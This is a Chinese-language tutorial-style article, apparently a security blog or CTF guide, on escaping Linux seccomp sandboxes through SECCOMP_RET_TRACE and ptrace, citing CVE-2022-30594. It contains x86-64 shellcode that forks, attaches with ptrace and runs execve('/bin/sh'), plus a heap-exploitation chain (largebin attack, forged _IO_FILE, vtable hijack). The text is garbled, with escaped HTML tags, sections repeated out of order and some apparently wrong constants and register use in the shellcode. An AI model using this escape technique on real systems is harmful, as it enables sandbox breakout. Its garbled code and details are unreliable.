SECCOMP_RET_TRACE沙箱绕过技术分析与实践<\/h1>

1. 背景介绍<\/h2>
SECCOMP（Secure Computing）是Linux内核提供的一种安全机制，用于限制进程可以执行的系统调用。当SECCOMP过滤器返回SECCOMP_RET_TRACE时，内核会通知ptrace跟踪器，这为沙箱绕过提供了可能性。<\/p>

2. SECCOMP_RET_TRACE与SECCOMP_RET_KILL的区别<\/h2>

特性<\/th> SECCOMP_RET_TRACE<\/th> SECCOMP_RET_KILL<\/th> <\/tr> <\/thead>

行为<\/td> 通知ptrace跟踪器<\/td> 直接终止进程<\/td> <\/tr>

干预机会<\/td> 可修改参数或返回值<\/td> 无干预机会<\/td> <\/tr>

无调试器时<\/td>

返回ENOSYS错误<\/td>

特性<\/th>	SECCOMP_RET_TRACE<\/th>	SECCOMP_RET_KILL<\/th> <\/tr> <\/thead>
行为<\/td>	通知ptrace跟踪器<\/td>	直接终止进程<\/td> <\/tr>
干预机会<\/td>	可修改参数或返回值<\/td>	无干预机会<\/td> <\/tr>
无调试器时<\/td>	返回ENOSYS错误<\/td>	直接终止<\/td> <\/tr> <\/tbody> <\/table> 3. SECCOMP_RET_TRACE工作机制<\/h2> 当seccomp过滤器返回SECCOMP_RET_TRACE时：<\/p> 内核检查是否有ptrace(2)附加的调试器<\/li> 如果没有调试器，系统调用被阻断，返回ENOSYS<\/li> 如果有调试器：调试器通过`PTRACE_SETOPTIONS<\/code>设置PTRACE_O_TRACESECCOMP<\/code><\/li>` `内核发送PTRACE_EVENT_SECCOMP<\/code>信号<\/li>` 调试器可通过PTRACE_GETEVENTMSG<\/code>获取SECCOMP_RET_DATA<\/code><\/li> <\/ul> <\/li> <\/ol> 调试器干预方式：<\/p> 跳过系统调用（系统调用号改为-1）<\/li> 篡改系统调用（修改为其他有效值）<\/li> 伪造返回值（通过寄存器注入）<\/li> <\/ol> 4. 内核版本差异<\/h2> Linux < 4.8的行为<\/h3> 调试器处理后，内核不会重新执行seccomp检查<\/li> 存在沙箱逃逸风险：攻击者可完全绕过过滤规则<\/li> <\/ul> Linux ≥ 4.8的行为<\/h3> 调试器修改操作后，内核会再次检查<\/li> 危险操作仍会被拒绝<\/li> <\/ul> 5. CVE-2022-30594漏洞分析<\/h2> 影响版本<\/strong>：Linux内核5.17.2之前<\/p> 漏洞本质<\/strong>：<\/p> PTRACE_SEIZE<\/code>操作中未正确校验PT_SUSPEND_SECCOMP<\/code>标志的设置权限<\/li> 攻击者可绕过seccomp对敏感系统调用的限制<\/li> <\/ul> 利用条件<\/strong>：<\/p> 存在可用的内存破坏漏洞（如UAF）<\/li> 目标系统内核版本在受影响范围内<\/li> 能够执行fork和ptrace操作<\/li> <\/ol> 6. 利用技术实践<\/h2> 6.1 前置准备<\/h3> 泄露libc和堆地址<\/li> 通过largebin attack攻击_IO_list_all<\/code><\/li> 使用mprotect<\/code>开辟可执行内存区域<\/li> <\/ol> 6.2 shellcode编写要点<\/h3> ; 1. fork创建子进程 <\/span><\/span><\/span><\/span>fork: <\/span><\/span> mov<\/span> rax<\/span>, 57<\/span> ; fork系统调用号 <\/span><\/span><\/span><\/span> syscall<\/span> <\/span><\/span> test<\/span> rax<\/span>, rax<\/span> <\/span><\/span> jz<\/span> child_process<\/span> <\/span><\/span> <\/span><\/span>; 2. 父进程追踪子进程 <\/span><\/span><\/span><\/span>parent_process: <\/span><\/span> ; ptrace(PTRACE_ATTACH, pid, 0, 0) <\/span><\/span><\/span><\/span> mov<\/span> rdi<\/span>, rax<\/span> ; 子进程PID <\/span><\/span><\/span><\/span> mov<\/span> rsi<\/span>, 16<\/span> ; PTRACE_ATTACH <\/span><\/span><\/span><\/span> xor<\/span> rdx<\/span>, rdx<\/span> <\/span><\/span> xor<\/span> r10<\/span>, r10<\/span> <\/span><\/span> mov<\/span> rax<\/span>, 101<\/span> ; ptrace系统调用号 <\/span><\/span><\/span><\/span> syscall<\/span> <\/span><\/span> <\/span><\/span> ; wait4(pid, &status, 0, NULL) <\/span><\/span><\/span><\/span> mov<\/span> rdi<\/span>, rax<\/span> <\/span><\/span> lea<\/span> rsi<\/span>, [rsp-8<\/span>] <\/span><\/span> xor<\/span> rdx<\/span>, rdx<\/span> <\/span><\/span> xor<\/span> r10<\/span>, r10<\/span> <\/span><\/span> mov<\/span> rax<\/span>, 61<\/span> ; wait4系统调用号 <\/span><\/span><\/span><\/span> syscall<\/span> <\/span><\/span> <\/span><\/span> ; ptrace(PTRACE_SETOPTIONS, pid, 0, PTRACE_O_TRACESECCOMP) <\/span><\/span><\/span><\/span> mov<\/span> rsi<\/span>, 0x4200<\/span> ; PTRACE_O_TRACESECCOMP <\/span><\/span><\/span><\/span> mov<\/span> rax<\/span>, 101<\/span> <\/span><\/span> syscall<\/span> <\/span><\/span> <\/span><\/span> ; ptrace(PTRACE_CONT, pid, 0, 0) <\/span><\/span><\/span><\/span> mov<\/span> rsi<\/span>, 7<\/span> ; PTRACE_CONT <\/span><\/span><\/span><\/span> mov<\/span> rax<\/span>, 101<\/span> <\/span><\/span> syscall<\/span> <\/span><\/span> jmp<\/span> exit<\/span> <\/span><\/span> <\/span><\/span>; 3. 子进程执行execve("\/bin\/sh") <\/span><\/span><\/span><\/span>child_process: <\/span><\/span> ; ptrace(PTRACE_TRACEME, 0, 0, 0) <\/span><\/span><\/span><\/span> xor<\/span> rdi<\/span>, rdi<\/span> <\/span><\/span> mov<\/span> rsi<\/span>, 0<\/span> ; PTRACE_TRACEME <\/span><\/span><\/span><\/span> xor<\/span> rdx<\/span>, rdx<\/span> <\/span><\/span> xor<\/span> r10<\/span>, r10<\/span> <\/span><\/span> mov<\/span> rax<\/span>, 101<\/span> <\/span><\/span> syscall<\/span> <\/span><\/span> <\/span><\/span> ; execve("\/bin\/sh", NULL, NULL) <\/span><\/span><\/span><\/span> xor<\/span> rsi<\/span>, rsi<\/span> <\/span><\/span> push<\/span> rsi<\/span> <\/span><\/span> mov<\/span> rdi<\/span>, 0x68732f6e69622f<\/span> ; "\/bin\/sh" <\/span><\/span><\/span><\/span> push<\/span> rdi<\/span> <\/span><\/span> mov<\/span> rdi<\/span>, rsp<\/span> <\/span><\/span> xor<\/span> rdx<\/span>, rdx<\/span> <\/span><\/span> mov<\/span> rax<\/span>, 59<\/span> ; execve系统调用号 <\/span><\/span><\/span><\/span> syscall<\/span> <\/span><\/span> <\/span><\/span>exit: <\/span><\/span> mov<\/span> rax<\/span>, 60<\/span> ; exit系统调用号 <\/span><\/span><\/span><\/span> syscall<\/span> <\/span><\/span><\/code><\/pre>6.3 完整利用步骤<\/h3> 利用UAF等漏洞泄露内存地址<\/li> 构造largebin attack修改_IO_list_all<\/code><\/li> 伪造_IO_FILE<\/code>结构体（如使用house of obstack）<\/li> 将vtable指向可控区域<\/li> 在可控区域布置shellcode<\/li> 触发IO操作执行shellcode<\/li> shellcode中： fork子进程<\/li> 父进程ptrace追踪子进程<\/li> 子进程执行被禁止的系统调用<\/li> 父进程修改子进程的系统调用行为<\/li> <\/ul> <\/li> <\/ol> 7. 防御措施<\/h2> 更新内核至5.17.2或更高版本<\/li> 在seccomp规则中禁止ptrace相关系统调用<\/li> 使用SECCOMP_FILTER_FLAG_TSYNC<\/code>同步线程规则<\/li> 最小化进程权限（如使用no_new_privs）<\/li> 结合namespace等隔离机制增强防护<\/li> <\/ol> 8. 总结<\/h2> SECCOMP_RET_TRACE机制原本用于调试目的，但在特定条件下可能被用于沙箱逃逸。理解其工作原理和内核版本差异对于安全开发和漏洞利用都至关重要。防御方应确保使用最新的内核版本和适当的seccomp配置，而攻击者则可以利用这些知识在CTF比赛或安全研究中突破限制。<\/p>

直接终止<\/td> <\/tr> <\/tbody> <\/table>

3. SECCOMP_RET_TRACE工作机制<\/h2>

当seccomp过滤器返回SECCOMP_RET_TRACE时：<\/p>

内核检查是否有ptrace(2)附加的调试器<\/li>
如果没有调试器，系统调用被阻断，返回ENOSYS<\/li>

如果有调试器：

调试器通过PTRACE_SETOPTIONS<\/code>设置PTRACE_O_TRACESECCOMP<\/code><\/li>
内核发送PTRACE_EVENT_SECCOMP<\/code>信号<\/li>

调试器可通过PTRACE_GETEVENTMSG<\/code>获取SECCOMP_RET_DATA<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
调试器干预方式：<\/p>

跳过系统调用（系统调用号改为-1）<\/li>
篡改系统调用（修改为其他有效值）<\/li>
伪造返回值（通过寄存器注入）<\/li>
<\/ol>
4. 内核版本差异<\/h2>
Linux < 4.8的行为<\/h3>

调试器处理后，内核不会重新执行seccomp检查<\/li>
存在沙箱逃逸风险：攻击者可完全绕过过滤规则<\/li>
<\/ul>
Linux ≥ 4.8的行为<\/h3>

调试器修改操作后，内核会再次检查<\/li>
危险操作仍会被拒绝<\/li>
<\/ul>
5. CVE-2022-30594漏洞分析<\/h2>
影响版本<\/strong>：Linux内核5.17.2之前<\/p>
漏洞本质<\/strong>：<\/p>

PTRACE_SEIZE<\/code>操作中未正确校验PT_SUSPEND_SECCOMP<\/code>标志的设置权限<\/li>
攻击者可绕过seccomp对敏感系统调用的限制<\/li>
<\/ul>
利用条件<\/strong>：<\/p>

存在可用的内存破坏漏洞（如UAF）<\/li>
目标系统内核版本在受影响范围内<\/li>
能够执行fork和ptrace操作<\/li>
<\/ol>
6. 利用技术实践<\/h2>
6.1 前置准备<\/h3>

泄露libc和堆地址<\/li>
通过largebin attack攻击_IO_list_all<\/code><\/li>
使用mprotect<\/code>开辟可执行内存区域<\/li>
<\/ol>
6.2 shellcode编写要点<\/h3>
; 1. fork创建子进程
<\/span><\/span><\/span><\/span>fork:
<\/span><\/span>    mov<\/span> rax<\/span>, 57<\/span>     ; fork系统调用号
<\/span><\/span><\/span><\/span>    syscall<\/span>
<\/span><\/span>    test<\/span> rax<\/span>, rax<\/span>
<\/span><\/span>    jz<\/span> child_process<\/span>
<\/span><\/span>
<\/span><\/span>; 2. 父进程追踪子进程
<\/span><\/span><\/span><\/span>parent_process:
<\/span><\/span>    ; ptrace(PTRACE_ATTACH, pid, 0, 0)
<\/span><\/span><\/span><\/span>    mov<\/span> rdi<\/span>, rax<\/span>    ; 子进程PID
<\/span><\/span><\/span><\/span>    mov<\/span> rsi<\/span>, 16<\/span>     ; PTRACE_ATTACH
<\/span><\/span><\/span><\/span>    xor<\/span> rdx<\/span>, rdx<\/span>
<\/span><\/span>    xor<\/span> r10<\/span>, r10<\/span>
<\/span><\/span>    mov<\/span> rax<\/span>, 101<\/span>    ; ptrace系统调用号
<\/span><\/span><\/span><\/span>    syscall<\/span>
<\/span><\/span>    
<\/span><\/span>    ; wait4(pid, &status, 0, NULL)
<\/span><\/span><\/span><\/span>    mov<\/span> rdi<\/span>, rax<\/span>
<\/span><\/span>    lea<\/span> rsi<\/span>, [rsp-8<\/span>]
<\/span><\/span>    xor<\/span> rdx<\/span>, rdx<\/span>
<\/span><\/span>    xor<\/span> r10<\/span>, r10<\/span>
<\/span><\/span>    mov<\/span> rax<\/span>, 61<\/span>     ; wait4系统调用号
<\/span><\/span><\/span><\/span>    syscall<\/span>
<\/span><\/span>    
<\/span><\/span>    ; ptrace(PTRACE_SETOPTIONS, pid, 0, PTRACE_O_TRACESECCOMP)
<\/span><\/span><\/span><\/span>    mov<\/span> rsi<\/span>, 0x4200<\/span> ; PTRACE_O_TRACESECCOMP
<\/span><\/span><\/span><\/span>    mov<\/span> rax<\/span>, 101<\/span>
<\/span><\/span>    syscall<\/span>
<\/span><\/span>    
<\/span><\/span>    ; ptrace(PTRACE_CONT, pid, 0, 0)
<\/span><\/span><\/span><\/span>    mov<\/span> rsi<\/span>, 7<\/span>      ; PTRACE_CONT
<\/span><\/span><\/span><\/span>    mov<\/span> rax<\/span>, 101<\/span>
<\/span><\/span>    syscall<\/span>
<\/span><\/span>    jmp<\/span> exit<\/span>
<\/span><\/span>
<\/span><\/span>; 3. 子进程执行execve("\/bin\/sh")
<\/span><\/span><\/span><\/span>child_process:
<\/span><\/span>    ; ptrace(PTRACE_TRACEME, 0, 0, 0)
<\/span><\/span><\/span><\/span>    xor<\/span> rdi<\/span>, rdi<\/span>
<\/span><\/span>    mov<\/span> rsi<\/span>, 0<\/span>      ; PTRACE_TRACEME
<\/span><\/span><\/span><\/span>    xor<\/span> rdx<\/span>, rdx<\/span>
<\/span><\/span>    xor<\/span> r10<\/span>, r10<\/span>
<\/span><\/span>    mov<\/span> rax<\/span>, 101<\/span>
<\/span><\/span>    syscall<\/span>
<\/span><\/span>    
<\/span><\/span>    ; execve("\/bin\/sh", NULL, NULL)
<\/span><\/span><\/span><\/span>    xor<\/span> rsi<\/span>, rsi<\/span>
<\/span><\/span>    push<\/span> rsi<\/span>
<\/span><\/span>    mov<\/span> rdi<\/span>, 0x68732f6e69622f<\/span> ; "\/bin\/sh"
<\/span><\/span><\/span><\/span>    push<\/span> rdi<\/span>
<\/span><\/span>    mov<\/span> rdi<\/span>, rsp<\/span>
<\/span><\/span>    xor<\/span> rdx<\/span>, rdx<\/span>
<\/span><\/span>    mov<\/span> rax<\/span>, 59<\/span>     ; execve系统调用号
<\/span><\/span><\/span><\/span>    syscall<\/span>
<\/span><\/span>
<\/span><\/span>exit:
<\/span><\/span>    mov<\/span> rax<\/span>, 60<\/span>     ; exit系统调用号
<\/span><\/span><\/span><\/span>    syscall<\/span>
<\/span><\/span><\/code><\/pre>6.3 完整利用步骤<\/h3>

利用UAF等漏洞泄露内存地址<\/li>
构造largebin attack修改_IO_list_all<\/code><\/li>
伪造_IO_FILE<\/code>结构体（如使用house of obstack）<\/li>
将vtable指向可控区域<\/li>
在可控区域布置shellcode<\/li>
触发IO操作执行shellcode<\/li>
shellcode中：

fork子进程<\/li>
父进程ptrace追踪子进程<\/li>
子进程执行被禁止的系统调用<\/li>
父进程修改子进程的系统调用行为<\/li>
<\/ul>
<\/li>
<\/ol>
7. 防御措施<\/h2>

更新内核至5.17.2或更高版本<\/li>
在seccomp规则中禁止ptrace相关系统调用<\/li>
使用SECCOMP_FILTER_FLAG_TSYNC<\/code>同步线程规则<\/li>
最小化进程权限（如使用no_new_privs）<\/li>
结合namespace等隔离机制增强防护<\/li>
<\/ol>
8. 总结<\/h2>
SECCOMP_RET_TRACE机制原本用于调试目的，但在特定条件下可能被用于沙箱逃逸。理解其工作原理和内核版本差异对于安全开发和漏洞利用都至关重要。防御方应确保使用最新的内核版本和适当的seccomp配置，而攻击者则可以利用这些知识在CTF比赛或安全研究中突破限制。<\/p>

SECCOMP_RET_TRACE沙箱绕过技术分析与实践<\/h1>

1. 背景介绍<\/h2> SECCOMP（Secure Computing）是Linux内核提供的一种安全机制，用于限制进程可以执行的系统调用。当SECCOMP过滤器返回SECCOMP_RET_TRACE时，内核会通知ptrace跟踪器，这为沙箱绕过提供了可能性。<\/p>

4. 内核版本差异<\/h2>

6. 利用技术实践<\/h2>

1. 背景介绍<\/h2>
SECCOMP（Secure Computing）是Linux内核提供的一种安全机制，用于限制进程可以执行的系统调用。当SECCOMP过滤器返回SECCOMP_RET_TRACE时，内核会通知ptrace跟踪器，这为沙箱绕过提供了可能性。<\/p>